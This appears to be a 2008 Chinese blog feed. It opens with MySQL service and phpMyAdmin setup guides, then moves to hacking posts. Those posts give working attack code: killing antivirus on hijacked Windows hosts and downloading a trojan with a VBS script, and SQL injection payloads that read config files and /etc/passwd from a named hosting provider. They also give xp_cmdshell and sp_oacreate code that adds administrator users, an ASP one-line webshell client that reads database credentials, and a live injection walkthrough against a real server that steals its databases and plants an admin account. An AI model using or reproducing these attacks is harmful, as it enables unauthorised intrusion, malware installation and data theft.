同缘博客 http://www.newtzly.net/newblog/ 0 Oblog 4.0 rok_i@126.com <![CDATA[【经验】安装、卸载mysql服务]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1217.html roki 2008-2-5 22:44:00 安装、卸载mysql服务
 
 
1、卸载mysql得时候先要 ,命令行下    net stop mysql
 
2、点击“添加/删除”程序里的 mysql5.0 ,进行卸载
 
3、检查任务管理器里得相关进程是不是停止,检查服务里的mysql服务是不是没有了
 
4、重启系统
 
5、删除原先mysql安装目录下的所有的安装文件
----------------------
 
安装时可能会遇到 配置时,最后一步里有 4个循序的项目,程序一个一个自动完成,其中后2个可能会遇到问题而失败
 
1)不能 “启动服务”,这个是因为进程没有被杀掉的缘故,还有mysql的进程 ,检查任务管理器,有mysql的进程就杀了
 
2)最后一个,英文叫什么 ~~~~~fix ?,这个只要,点try,即可。。。。
 
 
 
 
 
 
 
 
 
---------------------
 
以下引用文章:
 
 
 

安装mysql服务

新建并编辑内容如下的一个bat文件,执行之(e:\mysql\bin\mysqld-nt.exe为安装目录,按实际情况填写)

@ECHO OFF

e:\mysql\bin\mysqld-nt.exe -install

net start mysql

 

 

卸载mysql服务

新建并编辑内容如下的一个bat文件执行之(e:\mysql\bin\mysqld-nt.exe为安装目录,按实际情况填写)

@ECHO OFF

net stop mysql

c:\mysql\bin\mysqld-nt.exe -remove

 

 

 

--------------------------------------------

 

MYSQL启动不了的问题.具体表现如下:不管是直接双击mysqld.exe还是在命令提示符不都是没反应.(XP系统)

 

然后尝试 控制面板 >>> 管理工具 >>> 服务 >>> mysql 方法启动,弹出提示框就进程意外终止.郁闷了......

 

只好卸载了mysql重装,结果发现问题没解决.去请教别人竟得到重装系统的提示.开始抓狂了......

 

 

好了,痛苦的回忆就到这里,现在讲怎么解决.

 

首先是要卸载mysql服务,不然就算卸载了mysql程序,服务中依然有mysql这项,问题就解决不了.假设我的mysql装在C:\MYSQL,在命令提示符c:\mysql\bin下运行mysqld-nt -remove(中间有空格),会提示卸载成功.然后再在 控制面板 >>> 添加或删除程序 中卸载mysql,之后重启,再装上mysql运行mysqld.exe(win2000下是mysqld-nt.exe),命令提示符框一闪而过,这样你这可以在任务管理器中看到mysql这个进程了,也就是说你的mysql又复活了: )

 

 

 

------------------------------------------------------------------

 

安装常见问题之一:MYSQL为什么安装不成功?

 安装 MYSQL 不成功,一般是因为服务器可能安装过 MYSQL 而没有完全卸载,具体卸载方法如下:

 

第一步:

 

如果您的系统中安装有 MYSQL 数据库,请确认是否已经加载在系统服务中:打开“控制面板”的“管理工具”查看“服务”是否有“ MYSQL ”进程,如果有将其停止。

 

 

 

 

第二步:

 

请在 DOS 状态下执行 “ mysqld-nt -remove ”命令,将其在系统服务中删除。

 

第三步:

 

“ MYSQL系统服务”在 DOS 状态下删除成功。

 

第四步:

 

接下来请您在“控制面板”的“添加 / 删除程序”中将其卸载。

 

第五步:

 

在您的系统中将 c:\MYSQL 文件夹删除即可。

 

如果您确认以上所说的运行环境都已经完全删除。再次安装系统仍然无法使用。请到您的 c 盘符下。确认是否存在运行所需要的数据目录 c:\j2sdk1.4.1_03, c:\mysql,c:\resin 。并且系统服务里的 MYSQL 服务和 RESIN 服务都已启动。如果满足上述条件系统仍然无法使用,请您与恩信科技服务中心联系。恩信科技的服务工程师将及时,诚挚的为您解决系统中存在的问题。

]]> <![CDATA[PHPMYADMIN简明安装教程]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1216.html roki 2008-1-27 21:24:00 简单的说,phpmyadmin就是一种mysql的管理工具,安装该工具后,即可以通过web形式直接管理mysql数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者,下面我就说下怎么安装该工具:

1.先到网上下载phpmyadmin,再解压到可以访问的web目录下(如果是虚拟空间,可以解压后通过ftp等上传到web目录下),当然您可以修改解压后该文件的名称。

2.配置config文件
  打开libraries下的config.default.php文件,依次找到下面各项,按照说明配置即可:
A.访问网址
引用:
$cfg['PmaAbsoluteUri'] = '';这里填写phpmyadmin的访问网址

B.mysql主机信息
引用:
$cfg['Servers'][$i]['host'] = 'localhost'; // MySQL hostname or IP address
填写localhost或mysql所在服务器的ip地址,如果mysql和该phpmyadmin在同一服务器,则按默认localhost
$cfg['Servers'][$i]['port'] = ''; // MySQL port - leave blank for default port
mysql端口,如果是默认3306,保留为空即可

C.mysql用户名和密码
引用:
$cfg['Servers'][$i]['user'] = 'root'; // MySQL user 访问phpmyadmin使用的mysql用户名
fg['Servers'][$i]['password'] = ''; // MySQL password (only needed对应上述mysql用户名的密码
D.认证方法
引用:
$cfg['Servers'][$i]['auth_type'] = 'cookie';
在此有四种模式可供选择,cookie,http,HTTP,config
   config方式即输入phpmyadmin的访问网址即可直接进入,无需输入用户名和密码,是不安全的,不推荐使用。
   当该项设置为cookie,http或HTTP时,登录phpmyadmin需要数据用户名和密码进行验证,,具体如下:
   PHP安装模式为Apache,可以使用http和cookie;
   PHP安装模式为CGI,可以使用cookie

E.短语密码(blowfish_secret)的设置
引用:
$cfg['blowfish_secret'] = '';
如果认证方法设置为cookie,就需要设置短语密码,置于设置为什么密码,由您自己决定  ,但是不能留空,否则会在登录phpmyadmin时提示错误
  好了,到此为止,您已经成功安装了phpmyadmin,简单吧 ,赶快登录体验下吧

说明:
该文档说明的只是安装phpmyadmin的基本配置,关于config.default.php文件中各个配置参数的详细说明可以参考:http://www.discuz.net/viewthread.php?tid=50789&highlight=phpmyadmin
]]> <![CDATA[[原创]2000肉鸡取得DOS shell以后杀掉瑞星的进程!]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1215.html roki 2008-1-25 2:54:00 [原创]2000肉鸡取得DOS shell以后杀掉瑞星的进程!
洛奇 发表于 2007-3-13 10:36:00

溢出取得shell很多朋友都会,但是啊,常常有些肉鸡就是很郁闷,开着瑞星啊 之类的东西,让你传不了马过去......,这两天,我也是自己亲身摸索找到一个绝对好用的方法(2000系统下有效).

第一步:溢出取得 cmdshell (这个就不需要我去重复了吧?很多方法)


第二步:要找出当前瑞星的进程是哪个.在网上很少说道怎么在 DOS下查看进程的方法(总之我就很少找到,找到一个还不能用,气死了)

 

 

步骤脚本:

关瑞星防火墙之前 先重命名几个主要文件

cd C:\Program Files\Rising\Rav\
ren CCenter.exe CCenter.exe1
ren Rav.exe Rav.exe1
ren RavMon.exe RavMon.exe1
ren RavXP.exe RavXP.exe1
ren RavStub.exe RavStub.exe1
ren Ravmond.exe Ravmond.exe1
ren RavTask.exe RavTask.exe1


cd C:\Program Files\Rising\Rfw\
ren rfwsrv.exe rfwsrv.exe1
ren rfwmain.exe rfwmain.exe1

然后回到系统目录,创建查看线程的教本

cd C:\WINNT\system32

echo wscript.echo "PID ProcessName":for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ :wscript.echo ps.handle:wscript.echo ps.name:next >a.vbs


然后运行 
cscript a.vbs

找出正在运行的瑞星程序对应的PID 用下面命令杀进程(有多少进程杀多少,***表示运行中的进程PID)

ntsd -c q -p ***


杀完后 可以用 cscript a.vbs
确认一下,还有残留的要继续杀


接着 写入传木马教本

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://www.***.net/ma/m.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\winnt\system32\m.exe^",2 >d.vbs

执行它程序就会下载木马

cscript d.vbs

OK!回到提示符下 即可运行木马

M.EXE

------------------


把瑞星恢复

cd C:\Program Files\Rising\Rav\
ren CCenter.exe1 CCenter.exe
ren Rav.exe1 Rav.exe
ren RavMon.exe1 RavMon.exe
ren RavXP.exe1 RavXP.exe
ren RavStub.exe1 RavStub.exe
ren Ravmond.exe1 Ravmond.exe
ren RavTask.exe1 RavTask.exe


cd C:\Program Files\Rising\Rfw\
ren rfwsrv.exe1 rfwsrv.exe
ren rfwmain.exe1 rfwmain.exe



自己写了一个VBS 脚本.(前提是 肉鸡上 CSCRIPT能用,没被别的黑客删改掉,就绝对没问题的哦)

内容如下:
wscript.echo "PID ProcessName"
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echo ps.handle
wscript.echo ps.name
next


-----------以下是实际操作把这些内容写进一个a.vbs文本里-------------------
C:\>echo wscript.echo "PID ProcessName" >a.vbs

C:\>echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>a.vbs

C:\>echo wscript.echo ps.handle >>a.vbs

C:\>echo wscript.echo ps.name >>a.vbs

C:\>echo next >>a.vbs

---------------以下操作通过执行 a.vbs 可以列出所有的活动进程以及 进程ID--------------------
C:\>cscript a.vbs


----------------------结果如下:---------------------------------------------------------------


D:\>cscript_ a.vbs
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

PID ProcessName
0
System Idle Process
8
System
176
smss.exe
200
csrss.exe
220
WINLOGON.EXE
248
SERVICES.EXE
260
LSASS.EXE
460
svchost.exe
488
CCenter.exe
504
RavMonD.exe
592
spoolsv.exe
640
rundll32.exe
668
svchost.exe
716
LLSSRV.EXE
768
RavStub.exe
860
PPPoEService.ex
888
ShadowService.e
904
stisvc.exe
952
TAPPSRV.exe
980
winmgmt.exe
992
svchost.exe
1004
inetinfo.exe
1236
explorer.exe
1328
dfssvc.exe
1376
RavTask.exe
1392
RavMon.exe
1428
VStart.exe
1484
internat.exe
1496
svchost.exe
1504
sqlmangr.exe
288
EnterNetFolder.
244
EnterNet.exe
1136
QQ.exe
1008
ACDSee.exe
2120
conime.exe
532
GMTBJQYFMUBIQXE
1712
IEXPLORE.EXE
2912
IEXPLORE.EXE
3076
H_Client.exe
5516
IEXPLORE.EXE
5752
EasyPanel.exe
6608
IEXPLORE.EXE
4816
editplus.exe
5688
isqlw.exe
7244
notepad.exe
6992
nc.exe
7372
nc.exe
7380
nc.exe
7240
notepad.exe
1772
CMD.EXE
7592
CMD.EXE
5872
notepad.exe
5824
taskmgr.exe
7576
notepad.exe



以上看到了么?就是一个进程ID 接着一个进程名称,从上面可以看到我的瑞星进程ID是504

第三步:杀掉瑞星进程 ,好了 要杀掉这个该死的瑞星,谁让他档我上传网马呢?嘿嘿

用命令 c:/>ntsd -c q -p 504  

过一会 ,你发现 瑞星已经被我们关掉拉....不信你可以重新执行C:\>cscript a.vbs
查看一下....嘿嘿


第四步:传小马过去咯,方法多种多样.......流行的做法是 tftp 或者 ftp........没有瑞星的感觉真好....嘿嘿......如果这两种都不行,你就试试我这种.....哈哈哈

脚本下载法:



上传木马到主机上的脚本


C:\>echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs

C:\>echo xPost.Open "GET","http://你的木马网址/你的木马.exe",0 >>webdown.vbs

C:\>echo xPost.Send() >>webdown.vbs

C:\>echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs

C:\>echo sGet.Mode = 3 >>webdown.vbs

C:\>echo sGet.Type = 1 >>webdown.vbs

C:\>echo sGet.Open() >>webdown.vbs

C:\>echo sGet.Write(xPost.responseBody) >>webdown.vbs

C:\>echo sGet.SaveToFile "muma.exe",2 >>webdown.vbs

C:\>cscript webdown.vbs
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。


C:\>


这个时候 你的木马已经被下载到 C盘下了 ,名字就是 muma.exe

赶紧执行他吧 一会,就看到肉鸡上线咯.....

]]> <![CDATA[PHP+MYSQL的高级注入技术]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1214.html roki 2008-1-25 2:53:00

看到这里,应该可以想到我们可以做什么了,就是读取一些机密文件,但是也是有条件限制的:
  
  欲读取文件必须在服务器上
  
  必须指定文件完整的路径
  
  必须有权限读取并且文件必须完全可读
  
  欲读取文件必须小于 max_allowed_packet
  
  如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限,在windows下,如果NTFS设置得当,是不能读取相关的文件的,当遇到只有administrators才能访问的文件,users就别想load_file出来。
  
  在实际的注入中,我们有两个难点需要解决:
  
  绝对物理路径
  
  构造有效的畸形语句
  
  在很多PHP程序中,当提交一个错误的Query,如果display_errors = on,程序就会暴露WEB目录的绝对路径,只要知道路径,那么对于一个可以注入的PHP程序来说,整个服务器的安全将受到严重的威胁。构造语句已经是小意思了。
  
  利用
  我们假设一个程序的SQL语句如下:
  
  SELECT * FROM article WHERE articleid=$id
  
  注:当前条件:magic_quotes_gpc = off,c:/boot.ini可读。
  
  此时,我们构造$id为:
  
  -1 union select 1,1,1,1,load_file('c:/boot.ini')
  
  我们的Query就变成:
  
  SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file('c:/boot.ini')
  
  程序会把c:/boot.ini内容老老实实显示出来,但是现在magic_quotes_gpc = off的主机少之又少,怎么才能构造出没有引号的语句呢?看过《SQL Injection with MySQL》的朋友肯定知道用char()函数或者把字符转换成16进制,没错,就是它们。
  
  注:当前条件:magic_quotes_gpc = on,c:/boot.ini可读。
  
  我们构造$id为:
  
  -1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
  
  “char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的ASCII代码,我们的Query就变成:
  
  SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
  
  我们也可以成功的读取boot.ini文件,还有把字符串转换为16进制的,“c:/boot.ini”的16进制是“0x633a2f626f6f742e696e69”,所以上面的语句可以是这样:
  
  SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
  
  比较短了,看各人喜好了,大家可以在phpmyadmin或mysql>下输入以下查询慢慢研究。
  
  SELECT load_file([string])
  
  当然,在实际应用中,由于种种条件限制,文件的内容未必会显示出来,我们也可以用into outfile把文件导出。大家已经知道如何利用了,我也不说细节了,看一个实例说明一切。
  
  实例
  www.***host.cn是我国著名的FreeBSD主机提供商,我们就拿他来测试,因为它的论坛采用的是calendar.php存在问题的VBB论坛,我就不需要到处去找有漏洞的站点了(虽然到处都是)。这是一次完整的安全测试。仅仅获取信息,我并未进入服务器。
  
  这里补充说明一点关于VBB的根目录下global.php的一段代码,如下:
  
  // get rid of slashes in get / post / cookie data
  
  function stripslashesarray (&$arr) {
  
  while (list($key,$val)=each($arr)) {
  
  if ($key!="templatesused" and $key!="argc" and $key!="argv") {
  
  if (is_string($val) AND (strtoupper($key)!=$key OR ("".intval($key)=="$key"))) {
  
  $arr["$key"] = stripslashes($val);
  
  } else if (is_array($val) AND ($key == 'HTTP_POST_VARS' OR $key == 'HTTP_GET_VARS' OR strtoupper($key)!=$key)) {
  
  $arr["$key"] = stripslashesarray($val);
  
  }
  
  }
  
  }
  
  return $arr;
  
  }
  
  if (get_magic_quotes_gpc() and is_array($GLOBALS)) {
  
  if (isset($attachment)) {
  
  $GLOBALS['attachment'] = addslashes($GLOBALS['attachment']);
  
  }
  
  if (isset($avatarfile)) {
  
  $GLOBALS['avatarfile'] = addslashes($GLOBALS['avatarfile']);
  
  }
  
  $GLOBALS = stripslashesarray($GLOBALS);
  
  }
  set_magic_quotes_runtime(0);
  
  这段代码的作用就是如果magic_quotes_gpc打开,就去掉所有特殊字符的前面的转义字符,所以,不管php.ini里magic_quotes_gpc的状态如何,我们输入的单引号都没有影响的,大家可以放心注入。呵呵。
  
  我们知道,提交:
  
  /calendar.php?action=edit&eventid=1 UNION SELECT 1,1,1,1,username,password FROM user WHERE userid=1
  
  是可以获取用户名和密码MD5散列的,但是由于特殊原因,并没有显示出来,但凭我的经验,知道并没有构造错,所以我们可以读取并导出成文件。
  
  因为事先我无意中访问到了含有phpinfo()的文件,所以知道了WEB的绝对路径,从访问站点的结果,发现一个下载系统是生成HTML文件的,如果那个目录没有可写权限,是不能生成HTML文件的,不过这一切都不是本文的重点,我们现在掌握如下信息:
  
  WEB绝对路径:/home/4ngel
  
  可写目录路径:/home/4ngel/soft/
  
  magic_quotes_gpc = on
  
  和主机root相比,论坛的admin根本就不算什么,我对论坛admin也不感兴趣,我们要读取论坛的配置文件还有/etc/passwd,知道MySQL的连接信息,可以从这里入手,写webshell或其他的东西,知道/etc/passwd我们可以跑密码。直接从ssh上去。
  
  VBB论坛的配置文件在/home/4ngel/forum/admin/config.php,转换成ASCII代码,提交:
  
  calendar.php?action=edit&eventid=1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile '/home/4ngel/soft/cfg.txt'
  
  呵呵,记得加一个where来定一个条件,否则如果论坛用户很多,那么导出的文件会相当大。或者干脆指定$eventid为一个不存在的值,就不用where了,就像这样:
  
  calendar.php?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user into outfile '/home/4ngel/soft/cfg.txt'
  
  /etc/passwd转换成ASCII代码,提交:
  
  calendar.php?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1, load_file (char(47,101,116,99,47,112,97,115,115,119,100)) FROM user into outfile '/home/4ngel/soft/etcpwd.txt'
  
  注意看到论坛的顶部,会出现下面的错误提示:
  
  Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line 154
  
  经验告诉我们,文件导出成功了,提交:
  
  http://www.xxxhost.cn/soft/cfg.txt
  
  http://www.xxxhost.cn/soft/etcpwd.txt
  
  内容哗啦啦的出来了,而黑夜和猪蛋的他们入侵灰色的时候,一个个显示密码,欺骗,登陆后台,上传后门,读取config.php,一连串的步骤,我一个load_file()就搞定了。是不是危害很大?
  
  我记得在某个群里讨论到大家都是通过搞9****.net这个站,而进入黑白服务器的,没有办法对黑白横冲直闯,只得来曲线的。用load_file()函数,知道了某些信息就可以进入黑白所在的服务器,过程和上面的一样,利用show.php的漏洞,直接load_file出程序的配置文件,知道了mysql的信息,远程连接,写数据库导出文件,很容易获得服务器admin。
]]> <![CDATA[两段利用SA权限提升权限的代码]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1213.html roki 2008-1-25 2:52:00

方法一:

获得一个 webshell 以及一个机器的 sql server的sa权限后,在 机器不开通 Sql远程登陆的情况下,我就会用这段代码,来实现本地执行我需要执行的dos命令。
-------------------------------


<%

    actionstr=request("action")
    uid=sa
    pwd=sa
    db="master"


    if actionstr<>"" then

    dim conn
  dim connstr
  Set conn = Server.CreateObject("ADODB.Connection")
  connstr="Driver={SQL Server};server=(local);uid="&uid&";pwd="&pwd&";database="&db&";"
  conn.Open connstr


    sql="master.dbo.xp_cmdshell '"&actionstr&"'"
    conn.execute(sql)
   
 


    conn.close
    set conn=nothing
    end if
  %>

 

方法二:

这个是直接在查询分析器中执行,利用wscript来实现,就是 当xp_cmdshell 被系统管理员删除了的情况下,可以使用这招!

declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'

--------------------------增加权限---------------------------------------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'


]]> <![CDATA[【原创】改造一句话木马读取数据库连接信息]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1212.html roki 2008-1-25 2:51:00


一句话木马的常用做法是利用数据库备份生成一个 asp文件,然后利用连接端再生成一个大马。

但是!很多大马都遭到杀软的通缉,写进去很多不是被杀就是被封!

看了一句话木马的原理,其实非常简单,我突发奇想,按理说也应该可以读取到sql的连接信息,如果我已经知道了conn.asp的位置的话(可以通过注入扫描工具 啊D 明小子之类的),如果读取了这个连接信息的文件conn.asp,把帐号密码读出来,那可以通过DBO提权,如果是SA的话那就更爽了。。。

于是我就自己试着改造(主要是客户端的改变)这个木马

---------

一句话木马内容如下,这个没什么好说的,也没什么好改的:

<%execute request("value")%>

-------蓝屏大叔的连接端源码如下----------------


<form action=http://www.xxx.com/a.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("fhod")
lP.SaveToFile server.mappath("ck.asp"),2
lP.Close
set lP=nothing
response.redirect "ck.asp"
</textarea>
<textarea name=fhod cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
<input type=submit value=提交>
</form>


-----------------------------------------------------




我改造的连接端如下:

<form action=http://www.xxxx.com/a.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
dim fso
Set FSO = Server.CreateObject("Scripting.FileSystemObject")
  File = Server.MapPath("../public/conn.asp")

n=0
If FSO.FileExists(File) = True Then '判断该文件是否存在


Set CTF=FSO.OpenTextFile(File,1,False,TristateFalse)
do while not(ctf.AtEndOfStream)
response.write "<br>-------"
response.write CTF.ReadLine
response.write "<br>------"
loop
End If
set ctf=nothing
set fso=nothing
</textarea>
<textarea name=fhod cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
<input type=submit value=提交>
</form>




----------------非常简单吧,嘿嘿,只是利用 FSO读取文本出来------------



注意两点:

1。要sql中文版 ,其他版读出来的是乱码!

2。要知道连接信息文件的相对路径

------------------------------------------

测试环境是 sql 2000 中文版 sp4


其他版本读出来的是乱码,目前原因估计可能是字符集的显示问题。。。。

如果大家有好的方法解决这个问题也可以一起测验一下哦

]]> <![CDATA[[黑客技术]一次刚做完得sql注入]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1211.html roki 2008-1-25 2:49:00
不过我没有做任何破坏,希望各位也抱着学习的心态来看这些代码。

千万不要做破坏,毕竟蛛丝马迹都是难逃的。。。。。。虽然没做什么破坏,但是我心里还是有些紧张,毕竟第一次实践注入。。。。。


最近一个朋友和我说他通过 IIS溢出获得了一个webshell 刚挂了一个网马,一个小时上线了 300多台肉鸡(很可怕的) ,可惜很快后门被封了漏洞也补上了,

问我有没有办法,我不好拒绝,只能说试试咯。。。他给我网址,我就用 啊D扫了下,,,哇,还真有四个注入漏洞,手工测了测,只有一个是 sql server 的,其余都是 ACCESS的,我对 ACCESS特别讨厌,反正也搞不出什么明堂来(如果没有可上传的管理后台的话)。


不过 漏洞嘛,一个就够了,要那么多干啥哩,,,,大家说是吧。。。

看了很多SQL注入的资料,掳起衣袖就开始。。。。

这个注入漏洞和很多用 ID=数字 的那种不一样,是字符串的,因此。。。我就构造了一个字符串出来。。
---------------------------------

http://61.*.*.*/assist/dim_counter2.asp?di=103&gourl=http://www.east***.com/xgss/newstock.html ' and (select count(*) from sysobjects) >11 and 'a'='a


http://61.*.*.*/assist/dim_counter2.asp?di=103&gourl=http://www.east**.com/xgss/newstock.html ' and (select count(*) from sysobjects) >1100000 and 'a'='a
-----------------------

反馈回来都是空白页,如果不仔细看根本看不出什么明堂哦,但是如果看源码,绝对是不一样的哦,一个源码是:
第一段返回的源码:
<script>location.href='http://www.east**.com/xgss/newstock.html ' and (select count(*) from sysobjects) >11 and 'a'='http://www.newtzly.net/newblog/a'</script>
第二段返回的源码:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312"></HEAD>
<BODY></BODY></HTML>


看出区别了么?一个条件成立的时候反馈回来的就是一个跳转代码(是 javascript的跳转代码),条件不成立的时候返回的是没有任何东西的。。。。第一段的条件是 (select count(*) from sysobjects) >11 数据库里的对象一般都超过11个的咯,所以说条件当然成立,第2段的条件是(select count(*) from sysobjects) >1100000 ,数据库里没有那么多对象,因此不成立,反馈回来的是空,于是就跳到了空白页面。


看到了吗?这两句说明了一个问题,‘号 和 =号没有被屏蔽,是 MSSQL数据库,可以通过这两种反馈回来的结果页面看出成功与否。。。。。


------------------------

接下来,,,,就是探测信息了,,,嘿嘿,看我构造的这些语句。。。。打字很累 我就不一一解释了哦,不明白的可以回帖 我来给你们解释。。。



http://61.××××/assist/dim_counter2.asp?di=103&gourl=http://www.east××××.com/xgss/newstock.html ' and (select top 1 name from sysobjects) >1 and 'a'='a

反馈出有一个对象 ahcmd

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'ahcmd' to a column of data type int.

/assist/dim_counter2.asp, line 12



------------------

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select count(*) from master.dbo.sysdatabases) >8 and 'a'='a


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select count(*) from master.dbo.sysdatabases) >7 and 'a'='a


猜出 里面有8个数据库(包括系统数据库)

--------------------


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select @@version)>8 and 'a'='a


Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.

确定版本信息

---------------------


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and user_name()>8 and 'a'='a








Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'comeonbaby' to a column of data type int.

/assist/dim_counter2.asp, line 12

确定用户名为 comeonbaby

----------------------------


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and db_name()>8 and 'a'='a


Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'EMASSIST' to a column of data type int.

/assist/dim_counter2.asp, line 12

获取当前的数据库名称为 EMASSIST

-----------------------------


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select top 1 name from master.dbo.sysdatabases where dbid>6)>8 and 'a'='a



Syntax error converting the nvarchar value 'EMASSIST' to a column of data type int.

第一个用户数据库名 是 EMASSIST

------------------------------

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select top 1 name from master.dbo.sysdatabases where dbid>7)>8 and 'a'='a

Syntax error converting the nvarchar value 'SearchLog' to a column of data type int.



第2个用户数据库名 为 SearchLog
(只有8个数据库,SQL默认是6个系统数据库哦,因此,不用继续看了,肯定是没有第3个用户数据库了。。。。。实事上我的结论被证明是对的。where dbid>8 的时候根本就没数据库了)
--------------------------------


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select IS_MEMBER('db_owner'))=1 and 'a'='a


测出是 db-owner权限

---------------------------------



http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select IS_SRVROLEMEMBER('sysadmin'))=1 and 'a'='a

不是 sa权限

------------------------------------

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';--;select top 1 a from ahcmd where 'a'='a


以上语句成功反馈,说明可以单独构造出一句独立的执行语句(;--;)在--的地方可以直接写自己的语句即可。


确定可以构造出一条执行语句

-----------------------------------

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';master.dbo.xp_regwrite ''HKEY_LOCAL_MACHINE'',''SOFTWARE\Microsoft\Windows\currentvers ion\run'',''aa'',''REG_SZ'',''net user abc abc /add'';select top 1 a from ahcmd where 'a'='a


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A 1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01;select top 1 a from ahcmd where 'a'='a


两步都是失败,说明没有读写注册表的权限
------------------------------------------------


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html' and (select [password] from master.dbo.sysxlogins where sid=0x01)>0 and 'a'='a


Microsoft OLE DB Provider for SQL Server error '80040e09'

SELECT permission denied on object 'sysxlogins', database 'master', owner 'dbo'.

/assist/dim_counter2.asp, line 12


没有权限,查看不了sa的密码(一般 dbowner都没有的)
------------------------------------------------



这时就要利用啊D帮忙了,让啊D分析出网站目录文件结构,嘻嘻,开始备份他的数据库

如果没有下载目录的话,备份出来也那不到啊,。。。。
-------------------------------------------------

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';backup database EMASSIST to disk='d:\assist\bak\a.bak' with init;select top 1 a from ahcmd where 'a'='a

备份数据库到D盘d:\assist\bak\a.bak

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';backup database SearchLog to disk='d:\assist\bak\s.bak';select top 1 a from ahcmd where 'a'='a

通过 http://61.****/assist/bak/a.bak 下载下来


好啦 ,拉下来一看 有300M。。。。。。释放出来的数据库竟然有8G!!!!!我忙了好一阵才疼出空间来,,,晕死了。。。。这只是一个库。。。


---------------------------
还原数据库后,发现有一个表EDITORLIST,存放的是管理员的用户密码信息,于是就用下面几句来探测下。。。

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';insert into EDITORLIST(editor_validity,editor_name,editor_create_time,editor_password)values('1','sunyan','2006-08-31 15:15:27.000','618a5676d977177f') ;select top 1 a from ahcmd where 'a'='a

